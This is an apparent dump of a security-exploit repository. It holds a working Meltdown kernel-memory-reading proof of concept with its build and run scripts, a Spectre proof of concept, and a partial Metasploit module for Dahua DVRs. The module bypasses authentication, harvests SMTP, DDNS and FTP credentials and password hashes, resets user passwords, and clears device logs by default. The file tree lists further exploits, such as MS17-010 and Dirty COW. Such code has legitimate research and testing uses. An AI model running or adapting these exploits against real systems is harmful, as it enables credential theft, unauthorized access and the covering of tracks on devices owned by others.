├── CPU_vul ├── linux │ ├── .gitignore │ ├── Makefile │ ├── README.md │ ├── meltdown.c │ └── run.sh └── win │ └── spectre_poc.c ├── Dahua_DVR_Auth_Bypass.rb ├── IIS_short_name_scanner.py ├── Jetleak-Testing-Script ├── README.md ├── jetleak_exp.py └── jetleak_tester.py ├── MS17-010 ├── ms17-010.php └── ms17-010.py ├── README.md ├── c0w.c ├── cve-2017-7269 ├── cve-2017-7269.rb └── readme.md ├── discuz_file_delete ├── exp.py └── readme.md ├── heartbleedtest.py ├── http_sys_test.py ├── java_RMI ├── attackRMI.jar ├── e8f31202-138f-4a60-adb1-114cce64afe1.jpg └── readme.md ├── jenkins_file_read ├── cve-2018-1999002.py └── readme.md ├── mongodb_unauth_access.py ├── nginx_range_overflow_cve-2017-7529.py ├── sqlinject ├── .DS_Store ├── README.txt ├── admin.php ├── admin_login.php ├── conn.php ├── index.php └── test.sql ├── ubuntu_tiquan.c ├── web_path+mima+msf_exp.md └── webshellscan ├── README.md └── webshellscan.py /CPU_vul/linux/.gitignore: -------------------------------------------------------------------------------- 1 | meltdown 2 | *.o 3 | -------------------------------------------------------------------------------- /CPU_vul/linux/Makefile: -------------------------------------------------------------------------------- 1 | 2 | CFLAGS += -O2 -msse2 3 | 4 | all: meltdown 5 | 6 | meltdown: meltdown.o 7 | 8 | clean: 9 | rm -f meltdown.o meltdown 10 | -------------------------------------------------------------------------------- /CPU_vul/linux/README.md: -------------------------------------------------------------------------------- 1 | # MELTDOWN EXPLOIT POC 2 | 3 | Speculative optimizations execute code in a non-secure manner leaving data 4 | traces in microarchitecture such as cache. 5 | 6 | Lipp et. al 2018 published their code 2018-01-09 at 7 | https://github.com/IAIK/meltdown. Look at their paper for details: 8 | https://meltdownattack.com/meltdown.pdf. 
9 | 10 | Can only dump `linux_proc_banner` at the moment, since requires accessed memory 11 | to be in cache and `linux_proc_banner` is cached on every read from 12 | `/proc/version`. Might work with `prefetch`. Works with `sched_yield`. 13 | 14 | Build with `make`, run with `./run.sh`. 15 | 16 | Can't defeat KASLR yet, so you may need to enter your password to find 17 | `linux_proc_banner` in the `/proc/kallsyms` (or do it manually). 18 | 19 | Flush+Reload and target array approach taken from spectre paper https://spectreattack.com/spectre.pdf 20 | implemented following clues from https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/. 21 | 22 | Pandora's box is open. 23 | 24 | Result: 25 | ``` 26 | $ make 27 | cc -O2 -msse2 -c -o meltdown.o meltdown.c 28 | cc meltdown.o -o meltdown 29 | $ ./run.sh 30 | looking for linux_proc_banner in /proc/kallsyms 31 | protected. requires root 32 | + find_linux_proc_banner /proc/kallsyms sudo 33 | + sudo awk 34 | /linux_proc_banner/ { 35 | if (strtonum("0x"$1)) 36 | print $1; 37 | exit 0; 38 | } /proc/kallsyms 39 | + linux_proc_banner=ffffffffa3e000a0 40 | + set +x 41 | cached = 29, uncached = 271, threshold 88 42 | read ffffffffa3e000a0 = 25 % 43 | read ffffffffa3e000a1 = 73 s 44 | read ffffffffa3e000a2 = 20 45 | read ffffffffa3e000a3 = 76 v 46 | read ffffffffa3e000a4 = 65 e 47 | read ffffffffa3e000a5 = 72 r 48 | read ffffffffa3e000a6 = 73 s 49 | read ffffffffa3e000a7 = 69 i 50 | read ffffffffa3e000a8 = 6f o 51 | read ffffffffa3e000a9 = 6e n 52 | read ffffffffa3e000aa = 20 53 | read ffffffffa3e000ab = 25 % 54 | read ffffffffa3e000ac = 73 s 55 | read ffffffffa3e000ad = 20 56 | read ffffffffa3e000ae = 28 ( 57 | read ffffffffa3e000af = 62 b 58 | read ffffffffa3e000b0 = 75 u 59 | read ffffffffa3e000b1 = 69 i 60 | read ffffffffa3e000b2 = 6c l 61 | read ffffffffa3e000b3 = 64 d 62 | read ffffffffa3e000b4 = 64 d 63 | read ffffffffa3e000b5 = 40 @ 64 | VULNERABLE 65 | VULNERABLE ON 66 | 4.10.0-42-generic 
#46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64 67 | processor : 0 68 | vendor_id : GenuineIntel 69 | cpu family : 6 70 | model : 158 71 | model name : Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz 72 | stepping : 9 73 | microcode : 0x5e 74 | cpu MHz : 3499.316 75 | cache size : 6144 KB 76 | physical id : 0 77 | ``` 78 | 79 | # Does not work 80 | 81 | If it compiles but fails with `Illegal instruction` then either your hardware 82 | is very old or it is a VM. Try compiling with: 83 | 84 | ```shell 85 | $ make CFLAGS=-DHAVE_RDTSCP=0 clean all 86 | ``` 87 | 88 | # Works on 89 | 90 | The Vulnerable CPU/Kernels list is moved here: 91 | https://github.com/paboldin/meltdown-exploit/issues/19 92 | 93 | The Invulnerable CPU/Kernels list is moved here: 94 | https://github.com/paboldin/meltdown-exploit/issues/22 95 | -------------------------------------------------------------------------------- /CPU_vul/linux/meltdown.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #include 12 | 13 | //#define DEBUG 1 14 | 15 | /* comment out if getting illegal insctructions error */ 16 | #ifndef HAVE_RDTSCP 17 | # define HAVE_RDTSCP 1 18 | #endif 19 | 20 | #if !(defined(__x86_64__) || defined(__i386__)) 21 | # error "Only x86-64 and i386 are supported at the moment" 22 | #endif 23 | 24 | 25 | #define TARGET_OFFSET 12 26 | #define TARGET_SIZE (1 << TARGET_OFFSET) 27 | #define BITS_READ 8 28 | #define VARIANTS_READ (1 << BITS_READ) 29 | 30 | static char target_array[VARIANTS_READ * TARGET_SIZE]; 31 | 32 | void clflush_target(void) 33 | { 34 | int i; 35 | 36 | for (i = 0; i < VARIANTS_READ; i++) 37 | _mm_clflush(&target_array[i * TARGET_SIZE]); 38 | } 39 | 40 | extern char stopspeculate[]; 41 | 42 | static void __attribute__((noinline)) 43 | speculate(unsigned long addr) 44 | { 45 | #ifdef __x86_64__ 46 | asm volatile ( 47 
| "1:\n\t" 48 | 49 | ".rept 300\n\t" 50 | "add $0x141, %%rax\n\t" 51 | ".endr\n\t" 52 | 53 | "movzx (%[addr]), %%eax\n\t" 54 | "shl $12, %%rax\n\t" 55 | "jz 1b\n\t" 56 | "movzx (%[target], %%rax, 1), %%rbx\n" 57 | 58 | "stopspeculate: \n\t" 59 | "nop\n\t" 60 | : 61 | : [target] "r" (target_array), 62 | [addr] "r" (addr) 63 | : "rax", "rbx" 64 | ); 65 | #else /* ifdef __x86_64__ */ 66 | asm volatile ( 67 | "1:\n\t" 68 | 69 | ".rept 300\n\t" 70 | "add $0x141, %%eax\n\t" 71 | ".endr\n\t" 72 | 73 | "movzx (%[addr]), %%eax\n\t" 74 | "shl $12, %%eax\n\t" 75 | "jz 1b\n\t" 76 | "movzx (%[target], %%eax, 1), %%ebx\n" 77 | 78 | 79 | "stopspeculate: \n\t" 80 | "nop\n\t" 81 | : 82 | : [target] "r" (target_array), 83 | [addr] "r" (addr) 84 | : "rax", "rbx" 85 | ); 86 | #endif 87 | } 88 | 89 | static inline int 90 | get_access_time(volatile char *addr) 91 | { 92 | int time1, time2, junk; 93 | volatile int j; 94 | 95 | #if HAVE_RDTSCP 96 | time1 = __rdtscp(&junk); 97 | j = *addr; 98 | time2 = __rdtscp(&junk); 99 | #else 100 | time1 = __rdtsc(); 101 | j = *addr; 102 | _mm_mfence(); 103 | time2 = __rdtsc(); 104 | #endif 105 | 106 | return time2 - time1; 107 | } 108 | 109 | static int cache_hit_threshold; 110 | static int hist[VARIANTS_READ]; 111 | void check(void) 112 | { 113 | int i, time, mix_i; 114 | volatile char *addr; 115 | 116 | for (i = 0; i < VARIANTS_READ; i++) { 117 | mix_i = ((i * 167) + 13) & 255; 118 | 119 | addr = &target_array[mix_i * TARGET_SIZE]; 120 | time = get_access_time(addr); 121 | 122 | if (time <= cache_hit_threshold) 123 | hist[mix_i]++; 124 | } 125 | } 126 | 127 | void sigsegv(int sig, siginfo_t *siginfo, void *context) 128 | { 129 | ucontext_t *ucontext = context; 130 | 131 | #ifdef __x86_64__ 132 | ucontext->uc_mcontext.gregs[REG_RIP] = (unsigned long)stopspeculate; 133 | #else 134 | ucontext->uc_mcontext.gregs[REG_EIP] = (unsigned long)stopspeculate; 135 | #endif 136 | return; 137 | } 138 | 139 | int set_signal(void) 140 | { 141 | struct sigaction act 
= { 142 | .sa_sigaction = sigsegv, 143 | .sa_flags = SA_SIGINFO, 144 | }; 145 | 146 | return sigaction(SIGSEGV, &act, NULL); 147 | } 148 | 149 | #define CYCLES 1000 150 | int readbyte(int fd, unsigned long addr) 151 | { 152 | int i, ret = 0, max = -1, maxi = -1; 153 | static char buf[256]; 154 | 155 | memset(hist, 0, sizeof(hist)); 156 | 157 | for (i = 0; i < CYCLES; i++) { 158 | ret = pread(fd, buf, sizeof(buf), 0); 159 | if (ret < 0) { 160 | perror("pread"); 161 | break; 162 | } 163 | 164 | clflush_target(); 165 | 166 | speculate(addr); 167 | check(); 168 | } 169 | 170 | #ifdef DEBUG 171 | for (i = 0; i < VARIANTS_READ; i++) 172 | if (hist[i] > 0) 173 | printf("addr %lx hist[%x] = %d\n", addr, i, hist[i]); 174 | #endif 175 | 176 | for (i = 1; i < VARIANTS_READ; i++) { 177 | if (!isprint(i)) 178 | continue; 179 | if (hist[i] && hist[i] > max) { 180 | max = hist[i]; 181 | maxi = i; 182 | } 183 | } 184 | 185 | return maxi; 186 | } 187 | 188 | static char *progname; 189 | int usage(void) 190 | { 191 | printf("%s: [hexaddr] [size]\n", progname); 192 | return 2; 193 | } 194 | 195 | static int mysqrt(long val) 196 | { 197 | int root = val / 2, prevroot = 0, i = 0; 198 | 199 | while (prevroot != root && i++ < 100) { 200 | prevroot = root; 201 | root = (val / root + root) / 2; 202 | } 203 | 204 | return root; 205 | } 206 | 207 | #define ESTIMATE_CYCLES 1000000 208 | static void 209 | set_cache_hit_threshold(void) 210 | { 211 | long cached, uncached, i; 212 | 213 | if (0) { 214 | cache_hit_threshold = 80; 215 | return; 216 | } 217 | 218 | for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) 219 | cached += get_access_time(target_array); 220 | 221 | for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) 222 | cached += get_access_time(target_array); 223 | 224 | for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) { 225 | _mm_clflush(target_array); 226 | uncached += get_access_time(target_array); 227 | } 228 | 229 | cached /= ESTIMATE_CYCLES; 230 | uncached /= ESTIMATE_CYCLES; 231 | 
232 | cache_hit_threshold = mysqrt(cached * uncached); 233 | 234 | printf("cached = %ld, uncached = %ld, threshold %d\n", 235 | cached, uncached, cache_hit_threshold); 236 | } 237 | 238 | static int min(int a, int b) 239 | { 240 | return a < b ? a : b; 241 | } 242 | 243 | int main(int argc, char *argv[]) 244 | { 245 | int ret, fd, i, score, is_vulnerable; 246 | unsigned long addr, size; 247 | static char expected[] = "%s version %s"; 248 | 249 | progname = argv[0]; 250 | if (argc < 3) 251 | return usage(); 252 | 253 | if (sscanf(argv[1], "%lx", &addr) != 1) 254 | return usage(); 255 | 256 | if (sscanf(argv[2], "%lx", &size) != 1) 257 | return usage(); 258 | 259 | memset(target_array, 1, sizeof(target_array)); 260 | 261 | ret = set_signal(); 262 | 263 | set_cache_hit_threshold(); 264 | 265 | fd = open("/proc/version", O_RDONLY); 266 | if (fd < 0) { 267 | perror("open"); 268 | return -1; 269 | } 270 | 271 | for (score = 0, i = 0; i < size; i++) { 272 | ret = readbyte(fd, addr); 273 | if (ret == -1) 274 | ret = 0xff; 275 | printf("read %lx = %x %c (score=%d/%d)\n", 276 | addr, ret, isprint(ret) ? ret : ' ', 277 | ret != 0xff ? 
hist[ret] : 0, 278 | CYCLES); 279 | 280 | if (i < sizeof(expected) && 281 | ret == expected[i]) 282 | score++; 283 | 284 | addr++; 285 | } 286 | 287 | close(fd); 288 | 289 | is_vulnerable = score > min(size, sizeof(expected)) / 2; 290 | 291 | if (is_vulnerable) 292 | fprintf(stderr, "VULNERABLE\n"); 293 | else 294 | fprintf(stderr, "NOT VULNERABLE\n"); 295 | 296 | exit(is_vulnerable); 297 | } 298 | -------------------------------------------------------------------------------- /CPU_vul/linux/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | find_linux_proc_banner() { 4 | $2 sed -n -re 's/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p' $1 5 | } 6 | 7 | echo "looking for linux_proc_banner in /proc/kallsyms" 8 | linux_proc_banner=$(find_linux_proc_banner /proc/kallsyms) 9 | if test -z $linux_proc_banner; then 10 | echo "protected. requires root" 11 | set -x 12 | linux_proc_banner=$(\ 13 | find_linux_proc_banner /proc/kallsyms sudo) 14 | 15 | set +x 16 | fi 17 | if test -z $linux_proc_banner; then 18 | echo "not found. reading /boot/System.map-$(uname -r)" 19 | set -x 20 | linux_proc_banner=$(\ 21 | find_linux_proc_banner /boot/System.map-$(uname -r) sudo) 22 | set +x 23 | fi 24 | if test -z $linux_proc_banner; then 25 | echo "not found. reading /boot/System.map" 26 | set -x 27 | linux_proc_banner=$(\ 28 | find_linux_proc_banner /boot/System.map sudo) 29 | set +x 30 | fi 31 | if test -z $linux_proc_banner; then 32 | echo "can't find linux_proc_banner, unable to test at all" 33 | exit 0 34 | fi 35 | 36 | if command -v taskset >/dev/null; then 37 | taskset 0x1 ./meltdown $linux_proc_banner 10 38 | else 39 | ./meltdown $linux_proc_banner 10 40 | fi 41 | vuln=$? 
42 | 43 | if test $vuln -eq 132; then 44 | echo "ILLEGAL INSTRUCTION" 45 | echo "try recompile with:" 46 | echo " make CFLAGS='-DHAVE_RDTSCP=0' clean all" 47 | echo "and run again" 48 | fi 49 | if test $vuln -eq 1; then 50 | echo "PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/19" 51 | echo "VULNERABLE ON" 52 | uname -rvi 53 | head /proc/cpuinfo 54 | exit 1 55 | fi 56 | if test $vuln -eq 0; then 57 | echo "PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/22" 58 | echo "NOT VULNERABLE ON" 59 | uname -rvi 60 | head /proc/cpuinfo 61 | exit 0 62 | fi 63 | -------------------------------------------------------------------------------- /CPU_vul/win/spectre_poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #ifdef _MSC_VER 5 | #include 6 | #pragma optimize("gt", on) 7 | #else 8 | #include 9 | #endif 10 | 11 | #ifndef _MSC_VER 12 | #define sscanf_s sscanf 13 | #endif 14 | 15 | unsigned int array1_size = 16; 16 | uint8_t unused1[64]; 17 | uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16}; 18 | uint8_t unused2[64]; 19 | uint8_t array2[256 * 512]; 20 | 21 | char* secret = "pwned by elknot@360corpsec"; 22 | 23 | uint8_t temp = 0; 24 | 25 | void victim_function(size_t x) 26 | { 27 | if (x < array1_size) 28 | { 29 | temp &= array2[array1[x] * 512]; 30 | } 31 | } 32 | 33 | #define CACHE_HIT_THRESHOLD (80) 34 | 35 | void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) 36 | { 37 | static int results[256]; 38 | int tries, i, j, k, mix_i, junk = 0; 39 | size_t training_x, x; 40 | register uint64_t time1, time2; 41 | volatile uint8_t* addr; 42 | 43 | for (i = 0; i < 256; i++) 44 | results[i] = 0; 45 | for (tries = 999; tries > 0; tries--) 46 | { 47 | for (i = 0; i < 256; i++) 48 | _mm_clflush(&array2[i * 512]); 49 | training_x = tries % array1_size; 50 | for (j = 29; j >= 0; j--) 51 | { 52 | _mm_clflush(&array1_size); 53 | for 
(volatile int z = 0; z < 100; z++) 54 | { 55 | } 56 | x = ((j % 6) - 1) & ~0xFFFF; 57 | x = (x | (x >> 16)); 58 | x = training_x ^ (x & (malicious_x ^ training_x)); 59 | victim_function(x); 60 | } 61 | 62 | for (i = 0; i < 256; i++) 63 | { 64 | mix_i = ((i * 167) + 13) & 255; 65 | addr = &array2[mix_i * 512]; 66 | time1 = __rdtscp(&junk); 67 | junk = *addr; 68 | time2 = __rdtscp(&junk) - time1; 69 | if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) 70 | results[mix_i]++; 71 | } 72 | 73 | j = k = -1; 74 | for (i = 0; i < 256; i++) 75 | { 76 | if (j < 0 || results[i] >= results[j]) 77 | { 78 | k = j; 79 | j = i; 80 | } 81 | else if (k < 0 || results[i] >= results[k]) 82 | { 83 | k = i; 84 | } 85 | } 86 | if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 87 | break; 88 | } 89 | results[0] ^= junk; 90 | value[0] = (uint8_t)j; 91 | score[0] = results[j]; 92 | value[1] = (uint8_t)k; 93 | score[1] = results[k]; 94 | } 95 | 96 | int main(int argc, const char* * argv) 97 | { 98 | printf("Putting '%s' in memory\n", secret); 99 | size_t malicious_x = (size_t)(secret - (char *)array1); 100 | int i, score[2], len = strlen(secret); 101 | uint8_t value[2]; 102 | 103 | for (i = 0; i < sizeof(array2); i++) 104 | array2[i] = 1; 105 | if (argc == 3) 106 | { 107 | sscanf_s(argv[1], "%p", (void * *)(&malicious_x)); 108 | malicious_x -= (size_t)array1; 109 | sscanf_s(argv[2], "%d", &len); 110 | } 111 | 112 | printf("Reading %d bytes:\n", len); 113 | while (--len >= 0) 114 | { 115 | printf("Reading at malicious_x = %p... ", (void *)malicious_x); 116 | readMemoryByte(malicious_x++, value, score); 117 | printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear")); 118 | printf("0x%02X=’%c’ score=%d ", value[0], 119 | (value[0] > 31 && value[0] < 127 ? 
value[0] : '?'), score[0]); 120 | if (score[1] > 0) 121 | printf("(second best: 0x%02X score=%d)", value[1], score[1]); 122 | printf("\n"); 123 | } 124 | #ifdef _MSC_VER 125 | printf("Press ENTER to exit\n"); 126 | getchar(); 127 | #endif 128 | return (0); 129 | } 130 | -------------------------------------------------------------------------------- /Dahua_DVR_Auth_Bypass.rb: -------------------------------------------------------------------------------- 1 | require 'msf/core' 2 | class Metasploit3 < Msf::Auxiliary 3 | include Msf::Exploit::Remote::Tcp 4 | include Msf::Auxiliary::Scanner 5 | include Msf::Auxiliary::Report 6 | 7 | def initialize 8 | super( 9 | 'Name' => 'Dahua DVR Auth Bypas Scanner', 10 | 'Version' => '$Revision: 1 $', 11 | 'Description' => 'Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user\'s password and clears the device logs', 12 | 'Author' => 'Jake Reynolds - Depth Security', 13 | 'License' => MSF_LICENSE 14 | ) 15 | deregister_options('RHOST') 16 | register_options( 17 | [ 18 | OptString.new('USERNAME', [true, 'A username to reset', '888888']), 19 | OptString.new('PASSWORD', [true, 'A password to reset the user with', 'abc123']), 20 | OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), 21 | OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), 22 | Opt::RPORT(37777) 23 | ], self.class) 24 | end 25 | 26 | def run_host(ip) 27 | usercount = 0 28 | u1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 29 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 30 | dvr_resp = "\xb1\x00\x00\x58\x00\x00\x00\x00" 31 | version = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + 32 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 33 | email = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + 34 | "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 35 | ddns = 
"\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + 36 | "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 37 | nas = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + 38 | "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 39 | channels = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 40 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 41 | "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" + 42 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 43 | groups = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" + 44 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 45 | users = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" + 46 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 47 | sn = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" + 48 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 49 | clear_logs = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" + 50 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 51 | clear_logs2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" + 52 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 53 | user = "root" 54 | pass = " w" 55 | user8pwhash = "4WzwxXxM" #888888 56 | user6pwhash = "sh15yfFM" #666666 57 | useradminpwhash = "6QNMIQGe" #admin 58 | connect() 59 | sock.put(u1) 60 | data = sock.recv(8) 61 | disconnect() 62 | if data == dvr_resp 63 | print_good("DVR FOUND: @ #{rhost}:#{rport}!") 64 | report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "Dahua-based DVR") 65 | connect() 66 | sock.put(version) 67 | data = sock.get(1024) 68 | if data =~ /[\x00]{8,}([[:print:]]+)/ 69 | ver = $1 70 | print_status("Version: #{ver} @ #{rhost}:#{rport}!") 71 | end 72 | 73 | sock.put(sn) 74 | 
data = sock.get(1024) 75 | if data =~ /[\x00]{8,}([[:print:]]+)/ 76 | serial = $1 77 | print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") 78 | end 79 | 80 | sock.put(email) 81 | if data = sock.get(1024).split('&&') 82 | print_status("Email Settings: @ #{rhost}:#{rport}!") 83 | if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ 84 | if mailhost = $1.split(':') 85 | print_status(" Server: #{mailhost[0]}") if !mailhost[0].nil? 86 | print_status(" Destination Email: #{data[1]}") if !mailhost[1].nil? 87 | end 88 | if !data[5].nil? and !data[6].nil? 89 | print_good(" SMTP User: #{data[5]}") if !data[5].nil? 90 | print_good(" SMTP Password: #{data[6]}") if !data[6].nil? 91 | report_auth_info(:host => mailhost[0], :port => mailhost[1], :user => data[5], 92 | :pass => data[6], :type => "Mail", :active => true) if ( !mailhost[0].nil? and 93 | !mailhost[1].nil? and !data[5].nil? and !data[6].nil? ) 94 | end 95 | end 96 | end 97 | 98 | sock.put(ddns) 99 | if data = sock.get(1024) 100 | data = data.split(/&&[0-1]&&/) 101 | data.each_with_index { 102 | |val, index| 103 | if index > 0 104 | val = val.split("&&") 105 | print_status("DDNS Settings @ #{rhost}:#{rport}!:") 106 | print_status(" DDNS Service: #{val[0]}") if !val.nil? 107 | print_status(" DDNS Server: #{val[1]}") if !val.nil? 108 | print_status(" DDNS Port: #{val[2]}") if !val.nil? 109 | print_status(" Domain: #{val[3]}") if !val.nil? 110 | print_good(" Username: #{val[4]}") if !val.nil? 111 | print_good(" Password: #{val[5]}") if !val.nil? 112 | report_auth_info(:host => val[1], :port => val[2], :user => val[4], :pass => val[5], :type => "DDNS", 113 | :active => true) if ( !val[1].nil? and !val[2].nil? and !val[4].nil? and !val[5].nil? 
) 114 | end 115 | 116 | } 117 | end 118 | 119 | sock.put(nas) 120 | if data = sock.get(1024) 121 | print_status("Nas Settings @ #{rhost}:#{rport}!:") 122 | server = '' 123 | port = '' 124 | if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ 125 | server = $1.unpack('C*').join('.') 126 | port = $2.unpack('S') 127 | print_status(" Nas Server #{server}") 128 | print_status(" Nas Port: #{port}") 129 | end 130 | if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ 131 | ftpuser = $1 132 | ftppass = $2 133 | print_good(" FTP User: #{ftpuser}") 134 | print_good(" FTP Password: #{ftppass}") 135 | #report_auth_info(:host => server, :port => port, :user => ftpuser, :pass => ftppass, :type => "FTP", 136 | #:active => true) if ( !server.nil? and !port.nil? and !ftpuser.nil? and !ftppass.nil? ) 137 | end 138 | end 139 | 140 | sock.put(channels) 141 | data = sock.get(1024).split('&&') 142 | disconnect() 143 | if (data.length > 1) 144 | print_status("Camera Channels @ #{rhost}:#{rport}!:") 145 | data.each_with_index { 146 | |val, index| 147 | print_status(" #{index+1}:#{val[/([[:print:]]+)/]}") 148 | } 149 | end 150 | connect() 151 | sock.put(users) 152 | if data = sock.get(1024).split('&&') 153 | print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") 154 | data.each { 155 | |val| 156 | usercount += 1 157 | print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") 158 | } 159 | end 160 | sock.put(groups) 161 | if data = sock.get(1024).split('&&') 162 | print_status("User Groups: @ #{rhost}:#{rport}!") 163 | data.each { 164 | |val| 165 | print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") 166 | } 167 | end 168 | if (datastore['RESET']) 169 | userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + 170 | ":" + datastore['PASSWORD'] 171 | u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + 172 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 173 | u2 = 
"\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + 174 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 175 | u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" + 176 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 177 | userstring 178 | sock.put(u1) 179 | data = sock.get(1024) 180 | sock.put(u2) 181 | data = sock.get(1024) 182 | sock.put(u3) 183 | data = sock.get(1024) 184 | sock.put(u1) 185 | if data = sock.get(1024) 186 | print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") 187 | end 188 | # elsif (datastore['ACTION'] == "DELETE") 189 | # u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + 190 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 191 | # u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + 192 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 193 | # delete = "\xa6\x00\x00\x00#{datastore['USERNAME'].length.chr}\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" + 194 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 195 | # datastore['USERNAME'] 196 | # print delete 197 | # sock.send(u1, 0) 198 | # sock.get_once 199 | # sock.send(delete, 0) 200 | # sock.get_once 201 | # sock.send(u2, 0) 202 | # sock.get_once 203 | # 204 | # 205 | # elsif (datastore['ACTION'] == "ADD") 206 | # userstring = (usercount + 1).to_s + ":" + datastore['USERNAME'] + ":" + datastore['PASSWORD'] 207 | # userstring << "\x3a\x31\x3a\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37" + 208 | # "\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x32\x30\x2c\x32\x31" + 209 | # "\x2c\x32\x32\x2c\x32\x33\x2c\x32\x34\x2c\x32\x35\x2c\x32\x36\x2c" + 210 | # "\x32\x37\x2c\x32\x38\x2c\x33\x37\x2c\x33\x38\x2c\x33\x39\x2c\x34" + 211 | # "\x30\x2c\x34\x32\x2c\x34\x33\x2c\x34\x34\x2c\x34\x35\x2c\x34\x36" + 212 | # 
